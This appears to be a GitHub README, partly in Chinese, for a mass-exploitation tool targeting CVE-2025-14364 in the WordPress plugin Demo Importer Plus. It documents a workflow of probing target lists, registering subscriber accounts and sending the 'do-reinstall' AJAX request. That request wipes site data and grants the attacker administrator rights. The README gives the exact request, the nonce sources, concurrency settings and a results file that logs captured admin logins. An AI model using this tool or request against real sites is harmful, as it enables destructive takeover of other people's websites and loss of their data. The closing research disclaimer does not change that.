Nxploited/CVE-2025-14364

GitHub: Nxploited/CVE-2025-14364

针对 Demo Importer Plus ≤ 2.0.8 的 CVE-2025-14364 漏洞利用工具,演示从注册到全站重置的完整攻击路径以复现权限提升。

Stars: 0 | Forks: 0

# CVE-2025-14364 Demo Importer Plus <= 2.0.8 - 缺少对已认证(订阅者+)站点的重置授权与权限提升 # CVE-2025-14364 — Demo Importer Plus · 全站重置 → 权限提升 ``` _ _ _ _ _ _ _ _ / \ / |_ __ ) / \ ) |_ __ /| |_|_ _) |_ |_|_ \_ \/ |_ /_ \_/ /_ _) | | _) |_) | ``` ![CVE](https://img.shields.io/badge/CVE-2025--14364-red?style=flat-square) ![CVSS](https://img.shields.io/badge/CVSS-8.8%20HIGH-orange?style=flat-square) ![Plugin](https://img.shields.io/badge/Plugin-Demo%20Importer%20Plus%20%E2%89%A4%202.0.8-blueviolet?style=flat-square) ![Auth](https://img.shields.io/badge/Auth-Subscriber%2B-yellow?style=flat-square) ![Python](https://img.shields.io/badge/Python-3.10%2B-blue?style=flat-square&logo=python) ![Platform](https://img.shields.io/badge/WordPress-21759B?style=flat-square&logo=wordpress) ![Author](https://img.shields.io/badge/By-Nxploited-brightgreen?style=flat-square) ## 〔 1 〕 漏洞 | | | |---|---| | **CVE** | CVE-2025-14364 | | **CVSS v3.1** | **8.8 HIGH** — `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` | | **CNA** | Wordfence | | **Plugin** | Demo Importer Plus | | **受影响版本** | 所有 ≤ **2.0.8** 的版本 | | **所需权限** | 订阅者(最低注册角色) | | **类型** | 缺少能力检查 → 全站重置 → 权限提升 | | **CWE** | CWE-862 · 缺少授权 | **根本原因:** `Ajax::handle_request()` 注册了 `demo_importer_plus` AJAX 动作,但未调用 `current_user_can()`。任意已认证订阅者可发送 `{"demo_action":"do-reinstall"}` 触发 `wp_install()`,该操作会删除除 `users` / `usermeta` 外的所有数据库表并重新运行 WordPress 安装流程——过程中自动将 **Administrator 角色** 赋予攻击账户。 ## 〔 2 〕 攻击流程 ``` Mode 1 — Diagnose Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users → Identify live WordPress targets Mode 2 — Register POST /wp-login.php?action=register → Create subscriber account → Activation email sent to inbox ↳ You MUST click the email link before running Mode 3 Mode 3 — Exploit POST /wp-login.php → Authenticate as subscriber GET /wp-admin/ → Extract wp-rest-nonce POST /wp-admin/admin-ajax.php action=demo_importer_plus {"demo_action":"do-reinstall"} → Trigger full site reset ← Response: "Site has been reset successfully" → Attacking account now holds Administrator role ``` ## 〔 3 〕 环境搭建 ``` git clone https://github.com/Nxploited/CVE-2025-14364.git cd CVE-2025-14364 pip install -r requirements.txt python3 CVE-2025-14364.py ``` **`requirements.txt`** ``` aiohttp>=3.9.0 colorama>=0.4.6 urllib3>=1.26.0 ``` ## 〔 4 〕 使用 ``` Mode [1/2/3]: 1 = Diagnose 2 = Register 3 = Exploit Targets file: list.txt (one host per line) Concurrency: default 30, max 200 Timeout: default 10s ``` **目标文件格式 — `list.txt`:** ``` https://target1.com target2.com http://target3.com ``` ### ► 模式 1 · 诊断 探测每个主机的四个端点并输出干净的结果。 ``` Mode: 1 ``` 输出 → `diagnostics_results.txt` · `passed_targets.txt` ### ► 模式 2 · 注册 ``` Mode: 2 Email: attacker@example.com Username: Nxploited Password: NxploitedSA ``` 输出 → `register_results.txt` ### ► 模式 3 · 漏洞利用 ``` Mode: 3 Username: Nxploited Password: NxploitedSA ``` 成功时工具会打印: ``` [HH:MM:SS] SUCCESS "success":true,"message":"Site has been reset successfully" -> https://target.com ``` 并写入 `exploit_results.txt`: ``` https://target.com/wp-login.php site:... user:Nxploited pass:NxploitedSA type:admin ``` ## 〔 5 〕 输出文件 | 文件 | 内容 | |---|---| | `diagnostics_results.txt` | 每个目标的完整探测 JSON | | `passed_targets.txt` | 干净目标(未检测到错误) | | `register_results.txt` | 注册尝试记录 | | `exploit_results.txt` | 登录 · Nonce · 重置结果 · 确认的管理员命中 | | `reset_results.txt` | 每个目标的原始 `do-reinstall` 响应 | ## 〔 6 〕 技术细节 **易受攻击的请求:** ``` POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1 Content-Type: application/json X-WP-Nonce: {"demo_action":"do-reinstall"} ``` **成功的响应:** ``` {"success": true, "data": {"message": "Site has been reset successfully"}} ``` **Nonce 提取 — 两个备用来源:** ``` wpApiSettings.nonce (from /wp-admin/ page source) elementorOneSettingsData.wpRestNonce (fallback) ``` ## 〔 7 〕 作者与联系 ``` By : Nxploited (Khaled Alenazi) GitHub : https://github.com/Nxploited Telegram : @KNxploited ``` [![GitHub](https://img.shields.io/badge/GitHub-Nxploited-181717?style=for-the-badge&logo=github)](https://github.com/Nxploited) [![Telegram](https://img.shields.io/badge/Telegram-@KNxploited-2CA5E0?style=for-the-badge&logo=telegram)](https://t.me/KNxploited) ## 〔 8 〕 免责声明 ``` THIS SOFTWARE IS RELEASED STRICTLY FOR SECURITY RESEARCH AND EDUCATION. The author bears zero responsibility for any actions taken with this tool against systems the operator does not own or have explicit written authorization to test. Unauthorized use against third-party systems violates computer crime laws in most jurisdictions (CFAA, CMA, and equivalents worldwide) and may result in criminal prosecution. You alone are responsible for ensuring you have lawful permission before running this tool against any target. ```
© 2025 Nxploited · 仅限安全研究 · Demo Importer Plus ≤ 2.0.8 · 已在 2.0.9 修复
标签:CVE-2025-14364, Demo Importer Plus, Subscriber+, WordPress, WordPress插件, 全站重置, 协议分析, 反取证, 安全评估, 插件安全, 数据库删除, 未授权访问, 权限提升, 权限绕过, 漏洞, 站点重置, 管理员分配, 逆向工具